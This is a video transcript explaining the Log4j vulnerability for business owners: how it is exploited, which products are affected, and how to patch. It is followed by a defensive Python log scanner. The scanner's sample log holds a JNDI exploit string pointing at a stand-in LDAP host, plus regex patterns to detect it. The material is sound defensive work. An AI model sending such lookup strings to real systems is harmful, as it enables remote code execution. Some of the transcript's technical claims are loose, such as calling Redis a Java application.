What is log4j and why should you care?

Captions
Hey, it's David Ruddock, founder and managing director of Insane Technologies. I wanted to talk to you very quickly about what this whole Log4j thing is, why it is melting down the internet at this point in time, how it works, why you should care and what you can do.

So, really, really quickly: Log4j (that's log, numeral 4, j) is a piece of software leveraged by programmers to help them when they are logging data in their application. Logging data basically means keeping a diary of the activities or actions performed in the application. That can be for security reasons, like looking at the various authentications that have happened so that maybe you can log malicious activity. It could also be for keeping a record of things that have happened in the application for debugging purposes, or just to generally know what the application has been doing. It's pretty common, and it's really used in lots and lots of applications, particularly applications that are written in the Java programming language, which is a lot.

Just briefly listing off a number of the applications that use this: Twitter, Steam, Tesla, a lot of what's called Apache applications (Apache is a foundation; they write a lot of software): Struts, Solr and Druid; Redis, which is a database caching application; Elasticsearch, which is a big log data collection platform and analytics platform used in many, many things; and Minecraft. In fact, the story goes that essentially this has been used by Minecraft players to attack other people on the server, and it's weird that all these things sort of start with video gamers.

But essentially the way it works is that what has been written into the Log4j library is that if it sees something that points to a web address, it will try and download the content of that web address and execute it. And there are valid reasons for this: your website, your business website, probably reaches out to other web addresses to pull in things like fonts or maybe style sheets, you know, the way that the thing looks. So this is pretty common, although for it to be within the logging mechanism of an application and be able to be accessed and called upon so easily is a little bit weird. This should have been disabled by default and you should have had to explicitly turn it on. What's been done in Log4j is that it's on by default and you have to explicitly turn it off.

So the way in which it's exploited is that anyone who attempts to connect to a web server running Log4j in the background can either send in the request a web address to go collect some malicious code from, or, you know, you go to www.insane.net.au and in the "contact us" form maybe you type in the malicious URL there. The website then pushes that little bit of code into the Log4j mechanism; Log4j then looks up that web address, downloads and then executes that malicious code.

Now, this is already being weaponized. We've seen actively over the weekend a number of IP addresses attempting to exploit numerous websites that we run, that our clients run. Thus far nothing has shown up. We have seen some crypto miners try to be run; that's something that tries to generate crypto coin or cryptocurrency like Bitcoin or Ethereum automatically. We're also seeing malicious payloads already for malware to happen.

So the worst case scenario that could happen from this is that your system is compromisable: they insert code into a form or into a web request to one of the things that your business runs that is accessible from the web, and it downloads and executes, say, a remote access trojan (think TeamViewer, but for bad guys). That would then allow them to take control of the system that they've compromised, and from there they could either move laterally through your business, ransomware your business, steal your data, do all sorts of horrible, horrible things.

The fix for this is that a lot of software vendors are releasing patches to fix it. It's also possible just to go in and change the settings to explicitly deny the feature. So there is a lot you can do. If you are currently uncertain whether or not your system may be susceptible to this, I can tell you that Ubiquiti UniFi controllers need to be patched straight away. FortiSIEM (Fortinet FortiSIEM) is apparently vulnerable. A bunch of TP-Link related controller software is vulnerable. There's a lot of things that are vulnerable. VMware vSphere ESXi, which is a hypervisor virtualization platform, is vulnerable. Like, there's a reason why the internet is melting down over this; it's a pretty serious vulnerability.

If you have any concerns, reach out. Our incident response team has a playbook for this already built out. We've been checking all of our clients all weekend; as I said, so far nothing has shown up, which is really, really good news. But, you know, we're here for you. If you've got any questions about this particular exploit or any other vulnerabilities or security questions, I would love to hear from you. Anyway, stay safe, see you later.
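The video describes the exposure path (a lookup string placed in a web request or form field reaches the logger) and mentions seeing IP addresses probing client sites over the weekend. The script below is an added example, not code from the video or from Insane Technologies: it scans Apache-style access log lines for Log4j lookup syntax and lists the source IPs to investigate. The log lines and IP addresses are constructed for the example, and the log format is assumed to be the common combined format.

```python
import re
from typing import List, Optional, Tuple

# Constructed access-log lines for the example (not taken from the video): a normal
# request, a request carrying a Log4j JNDI lookup in the User-Agent header, and a
# form POST that echoes ${...} lookup syntax, which no real browser or API client sends.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Dec/2021:09:12:01 +1000] "GET /contact HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Dec/2021:09:12:07 +1000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.example/a}"
203.0.113.9 - - [13/Dec/2021:09:13:44 +1000] "POST /contact HTTP/1.1" 302 0 "-" "curl/7.79" message=${unknown}
"""

# High confidence: the literal JNDI lookup prefix, in any letter case.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Lower confidence: any Log4j-style ${...} lookup inside an HTTP request. Legitimate
# clients do not emit this syntax, so its presence in a request is worth a look.
ANY_LOOKUP = re.compile(r"\$\{[^}]*\}")
# First whitespace-delimited field of a combined-format line is the client address.
CLIENT_IP = re.compile(r"^(\S+)\s")


def classify(line: str) -> Optional[str]:
    """Return 'high', 'medium' or None for one access-log line."""
    if JNDI_LOOKUP.search(line):
        return "high"
    if ANY_LOOKUP.search(line):
        return "medium"
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, severity, matched_text) for every suspicious line, in order."""
    hits = []
    for line in text.splitlines():
        severity = classify(line)
        if severity is None:
            continue
        ip_match = CLIENT_IP.match(line)
        ip = ip_match.group(1) if ip_match else "?"
        snippet = (JNDI_LOOKUP.search(line) or ANY_LOOKUP.search(line)).group(0)
        hits.append((ip, severity, snippet))
    return hits


def source_ips(hits: List[Tuple[str, str, str]]) -> List[str]:
    """Distinct client addresses that sent lookup syntax; a starting point for triage."""
    return sorted({ip for ip, _, _ in hits})


if __name__ == "__main__":
    for ip, sev, snippet in scan_log(SAMPLE_LOG):
        print(f"{sev:6} {ip:15} {snippet}")
```

A "high" hit means the request contained a JNDI lookup string; whether the logger actually resolved it depends on the Log4j version and settings on that host, so pair this with patch status and outbound connection logs from the same time window.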
Info
Channel: Insane Technologies
Views: 8,297
Id: QseOehu_9IE
Length: 6min 10sec (370 seconds)
Published: Mon Dec 13 2021